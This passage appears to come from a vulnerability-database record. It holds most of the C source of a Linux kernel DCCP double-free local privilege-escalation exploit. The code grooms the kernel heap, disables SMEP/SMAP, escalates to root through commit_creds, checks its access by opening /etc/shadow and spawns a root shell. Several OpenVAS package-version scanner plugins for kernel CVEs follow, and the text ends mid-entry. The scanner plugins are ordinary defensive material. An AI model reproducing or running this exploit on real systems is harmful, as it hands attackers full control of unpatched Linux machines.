setsockopt(handle, SOL_PACKET, PACKET_VERSION, \n&optval, sizeof(optval)); \nif (rv != 0) { \nperror(\"setsockopt(PACKET_VERSION)\"); \nexit(EXIT_FAILURE); \n} \nstruct tpacket_req3 tp; \nmemset(&tp, 0, sizeof(tp)); \ntp.tp_block_size = CONF_RING_FRAMES * getpagesize(); \ntp.tp_block_nr = 1; \ntp.tp_frame_size = getpagesize(); \ntp.tp_frame_nr = CONF_RING_FRAMES; \ntp.tp_retire_blk_tov = timeout; \nrv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING, \n(void *)&tp, sizeof(tp)); \nif (rv != 0) { \nperror(\"setsockopt(PACKET_RX_RING)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid socket_sendmmsg(int sock, char *buffer) { \nstruct mmsghdr msg[1]; \n \nmsg[0].msg_hdr.msg_iovlen = 0; \n \n// Buffer to kmalloc. \nmsg[0].msg_hdr.msg_control = &buffer[0]; \nmsg[0].msg_hdr.msg_controllen = 2048; \n \n// Make sendmmsg exit easy with EINVAL. \nmsg[0].msg_hdr.msg_name = \"root\"; \nmsg[0].msg_hdr.msg_namelen = 1; \n \nint rv = syscall(__NR_sendmmsg, sock, msg, 1, 0); \nif (rv == -1 && errno != EINVAL) { \nperror(\"[-] sendmmsg()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid sendmmsg_kmalloc_kfree(int port, char *buffer) { \nint sock[2]; \n \nint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock); \nif (rv != 0) { \nperror(\"socketpair()\"); \nexit(EXIT_FAILURE); \n} \n \nsocket_sendmmsg(sock[0], buffer); \n \nclose(sock[0]); \n} \n \n// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * * \n \nvoid dccp_connect_pad(struct dccp_handle *handle, int port) { \nhandle->sa.sin6_family = AF_INET6; \nhandle->sa.sin6_port = htons(port); \ninet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr); \nhandle->sa.sin6_flowinfo = 0; \nhandle->sa.sin6_scope_id = 0; \n \nhandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n \nint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"bind()\"); \nexit(EXIT_FAILURE); \n} \n \nrv = listen(handle->s1, 0x9); \nif (rv != 0) { \nperror(\"listen()\"); \nexit(EXIT_FAILURE); \n} \n \nhandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); \nif (handle->s1 == -1) { \nperror(\"socket(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n \nrv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); \nif (rv != 0) { \nperror(\"connect(SOCK_DCCP)\"); \nexit(EXIT_FAILURE); \n} \n} \n \nvoid dccp_kmalloc_pad() { \nint i; \nstruct dccp_handle handle; \nfor (i = 0; i < 4; i++) { \ndccp_connect_pad(&handle, port++); \n} \n} \n \nvoid timer_kmalloc_pad() { \nint i; \nfor (i = 0; i < 4; i++) { \nsocket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); \n} \n} \n \nvoid udp_kmalloc_pad() { \nint i, j; \nchar dummy[2048]; \nstruct udp_fifo_handle uh[16]; \nfor (i = 0; i < KMALLOC_PAD / 16; i++) { \nudp_fifo_init(&uh[i]); \nfor (j = 0; j < 16; j++) \nudp_fifo_kmalloc(&uh[i], &dummy[0]); \n} \n} \n \nvoid kmalloc_pad() { \ndebug(\"dccp kmalloc pad\"); \ndccp_kmalloc_pad(); \ndebug(\"timer kmalloc pad\"); \ntimer_kmalloc_pad(); \ndebug(\"udp kmalloc pad\"); \nudp_kmalloc_pad(); \n} \n \nvoid udp_kmalloc_warm() { \nint i, j; \nchar dummy[2048]; \nstruct udp_fifo_handle uh[16]; \nfor (i = 0; i < KMALLOC_WARM / 16; i++) { \nudp_fifo_init(&uh[i]); \nfor (j = 0; j < 16; j++) \nudp_fifo_kmalloc(&uh[i], &dummy[0]); \n} \nfor (i = 0; i < KMALLOC_WARM / 16; i++) { \nfor (j = 0; j < 16; j++) \nudp_fifo_kfree(&uh[i]); \n} \n} \n \nvoid kmalloc_warm() { \nudp_kmalloc_warm(); \n} \n \n// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * * \n \n// Executes func(arg) from interrupt context multiple times. \nvoid kernel_exec_irq(void *func, unsigned long arg) { \nint i; \nstruct dccp_handle dh; \nstruct udp_fifo_handle uh1, uh2, uh3, uh4; \nchar dummy[2048]; \nchar buffer[2048]; \n \nprintf(\"[.] scheduling %p(%p)\\n\", func, (void *)arg); \n \nmemset(&dummy[0], 0xc3, 2048); \ninit_timer_buffer(&buffer[0], func, arg); \n \nudp_fifo_init(&uh1); \nudp_fifo_init(&uh2); \nudp_fifo_init(&uh3); \nudp_fifo_init(&uh4); \n \ndebug(\"kmalloc pad\"); \nkmalloc_pad(); \n \ndebug(\"kmalloc warm\"); \nkmalloc_warm(); \n \ndebug(\"dccp init\"); \ndccp_init(&dh, port++); \n \ndebug(\"dccp kmalloc kfree\"); \ndccp_kmalloc_kfree(&dh); \n \ndebug(\"catch 1\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh1, &dummy[0]); \n \ndebug(\"dccp kfree again\"); \ndccp_kfree_again(&dh); \n \ndebug(\"catch 2\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh2, &dummy[0]); \n \nint timers[CATCH_FIRST]; \ndebug(\"catch 1 -> timer\"); \nfor (i = 0; i < CATCH_FIRST; i++) { \nudp_fifo_kfree(&uh1); \ntimers[i] = timer_kmalloc(); \n} \n \ndebug(\"catch 1 small\"); \nfor (i = 0; i < CATCH_AGAIN_SMALL; i++) \nudp_fifo_kmalloc_small(&uh4); \n \ndebug(\"schedule timers\"); \nfor (i = 0; i < CATCH_FIRST; i++) \ntimer_schedule(timers[i], 500); \n \ndebug(\"catch 2 -> overwrite timers\"); \nfor (i = 0; i < CATCH_FIRST; i++) { \nudp_fifo_kfree(&uh2); \nudp_fifo_kmalloc(&uh3, &buffer[0]); \n} \n \ndebug(\"catch 2 small\"); \nfor (i = 0; i < CATCH_AGAIN_SMALL; i++) \nudp_fifo_kmalloc_small(&uh4); \n \nprintf(\"[.] waiting for the timer to execute\\n\"); \n \ndebug(\"wait\"); \nsleep(1); \n \nprintf(\"[.] done\\n\"); \n} \n \nvoid disable_smep_smap() { \nprintf(\"[.] disabling SMEP & SMAP\\n\"); \nkernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE); \nprintf(\"[.] SMEP & SMAP should be off now\\n\"); \n} \n \n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * * \n \n// Executes func() from process context. \nvoid kernel_exec(void *func) { \nint i; \nstruct dccp_handle dh; \nstruct udp_fifo_handle uh1, uh2, uh3; \nchar dummy[2048]; \nchar buffer[2048]; \n \nprintf(\"[.] executing %p\\n\", func); \n \nmemset(&dummy[0], 0, 2048); \ninit_skb_buffer(&buffer[0], func); \n \nudp_fifo_init(&uh1); \nudp_fifo_init(&uh2); \nudp_fifo_init(&uh3); \n \ndebug(\"kmalloc pad\"); \nkmalloc_pad(); \n \ndebug(\"kmalloc warm\"); \nkmalloc_warm(); \n \ndebug(\"dccp init\"); \ndccp_init(&dh, port++); \n \ndebug(\"dccp kmalloc kfree\"); \ndccp_kmalloc_kfree(&dh); \n \ndebug(\"catch 1\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh1, &dummy[0]); \n \ndebug(\"dccp kfree again:\"); \ndccp_kfree_again(&dh); \n \ndebug(\"catch 2\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kmalloc(&uh2, &dummy[0]); \n \ndebug(\"catch 1 -> overwrite\"); \nfor (i = 0; i < CATCH_FIRST; i++) { \nudp_fifo_kfree(&uh1); \nsendmmsg_kmalloc_kfree(port++, &buffer[0]); \n} \ndebug(\"catch 2 -> free & trigger\"); \nfor (i = 0; i < CATCH_FIRST; i++) \nudp_fifo_kfree(&uh2); \n \ndebug(\"catch 1 & 2\"); \nfor (i = 0; i < CATCH_AGAIN; i++) \nudp_fifo_kmalloc(&uh3, &dummy[0]); \n \nprintf(\"[.] done\\n\"); \n} \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); \n \n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; \n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; \n \nvoid get_root_payload(void) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nvoid get_root() { \nprintf(\"[.] getting root\\n\"); \nkernel_exec(&get_root_payload); \nprintf(\"[.] should be root now\\n\"); \n} \n \n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * \n \nvoid exec_shell() { \nchar *shell = \"/bin/bash\"; \nchar *args[] = {shell, \"-i\", NULL}; \nexecve(shell, args, NULL); \n} \n \nvoid fork_shell() { \npid_t rv; \n \nrv = fork(); \nif (rv == -1) { \nperror(\"fork()\"); \nexit(EXIT_FAILURE); \n} \n \nif (rv == 0) { \nexec_shell(); \n} \n} \n \nbool is_root() { \n// We can't simple check uid, since we're running inside a namespace \n// with uid set to 0. Try opening /etc/shadow instead. \nint fd = open(\"/etc/shadow\", O_RDONLY); \nif (fd == -1) \nreturn false; \nclose(fd); \nreturn true; \n} \n \nvoid check_root() { \nprintf(\"[.] checking if we got root\\n\"); \n \nif (!is_root()) { \nprintf(\"[-] something went wrong =(\\n\"); \nprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\"); \nreturn; \n} \n \nprintf(\"[+] got r00t ^_^\\n\"); \nprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\"); \n \n// Fork and exec instead of just doing the exec to avoid freeing \n// skbuffs and prevent crashes due to a allocator corruption. \nfork_shell(); \n} \n \nstatic bool write_file(const char* file, const char* what, ...) \n{ \nchar buf[1024]; \nva_list args; \nva_start(args, what); \nvsnprintf(buf, sizeof(buf), what, args); \nva_end(args); \nbuf[sizeof(buf) - 1] = 0; \nint len = strlen(buf); \n \nint fd = open(file, O_WRONLY | O_CLOEXEC); \nif (fd == -1) \nreturn false; \nif (write(fd, buf, len) != len) { \nclose(fd); \nreturn false; \n} \nclose(fd); \nreturn true; \n} \n \nvoid setup_sandbox() { \nint real_uid = getuid(); \nint real_gid = getgid(); \n \nif (unshare(CLONE_NEWUSER) != 0) { \nperror(\"unshare(CLONE_NEWUSER)\"); \nexit(EXIT_FAILURE); \n} \n \nif (unshare(CLONE_NEWNET) != 0) { \nperror(\"unshare(CLONE_NEWUSER)\"); \nexit(EXIT_FAILURE); \n} \n \nif (!write_file(\"/proc/self/setgroups\", \"deny\")) { \nperror(\"write_file(/proc/self/set_groups)\"); \nexit(EXIT_FAILURE); \n} \nif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){ \nperror(\"write_file(/proc/self/uid_map)\"); \nexit(EXIT_FAILURE); \n} \nif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) { \nperror(\"write_file(/proc/self/gid_map)\"); \nexit(EXIT_FAILURE); \n} \n \ncpu_set_t my_set; \nCPU_ZERO(&my_set); \nCPU_SET(0, &my_set); \nif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { \nperror(\"sched_setaffinity()\"); \nexit(EXIT_FAILURE); \n} \n \nif (system(\"/sbin/ifconfig lo up\") != 0) { \nperror(\"system(/sbin/ifconfig lo up)\"); \nexit(EXIT_FAILURE); \n} \n \nprintf(\"[.] namespace sandbox setup successfully\\n\"); \n} \n \nint main() { \nsetup_sandbox(); \n \n#if SMEP_SMAP_BYPASS \ndisable_smep_smap(); \n#endif \n \nget_root(); \n \ncheck_root(); \n \nwhile (true) { \nsleep(100); \n} \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/141331/linux440dccp-escalate.txt"}], "openvas": [{"lastseen": "2020-01-27T18:33:38", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1369)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181369", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1369\");\n script_version(\"2020-01-23T11:23:38+0000\");\n script_cve_id(\"CVE-2017-18344\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:23:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:23:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1369)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1369\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1369\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1369 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent-sigev_notify field, which leads to out-of-bounds access in the show_timer function.(CVE-2017-18344)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 2.5.2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.44.5.10_103\", rls:\"EULEROSVIRT-2.5.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2872-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842609", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842609", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2872-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842609\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:46 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2872-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2872-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2872-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic-lpae\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-lowlatency\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-e500mc\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-smp\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-emb\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-smp\", ver:\"4.2.0-25.30\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "description": "Mageia Linux Local Security Checks mgasa-2016-0033", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0033", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131197", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0033.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131197\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 07:27:45 +0200 (Mon, 25 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0033\");\n script_tag(name:\"insight\", value:\"Perception Point Research Team found a reference leak in keyring in join_session_keyring() that can be exploited to successfully escalate privileges from a local user to root (CVE-2016-0728). Other fixes in this kernel update: - netfilter: nf_nat_redirect: add missing NULL pointer check\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0033.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0033\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-userspace-headers\", rpm:\"kernel-userspace-headers~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-vboxadditions\", rpm:\"kmod-vboxadditions~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-virtualbox\", rpm:\"kmod-virtualbox~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-xtables-addons\", rpm:\"kmod-xtables-addons~2.7~8.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-broadcom-wl\", rpm:\"kmod-broadcom-wl~6.30.223.271~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-fglrx\", rpm:\"kmod-fglrx~15.200.1046~9.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia304\", rpm:\"kmod-nvidia304~304.128~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia340\", rpm:\"kmod-nvidia340~340.93~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia-current\", rpm:\"kmod-nvidia-current~346.96~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-2872-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842611", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-2872-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842611\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:48 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-2872-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code with\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 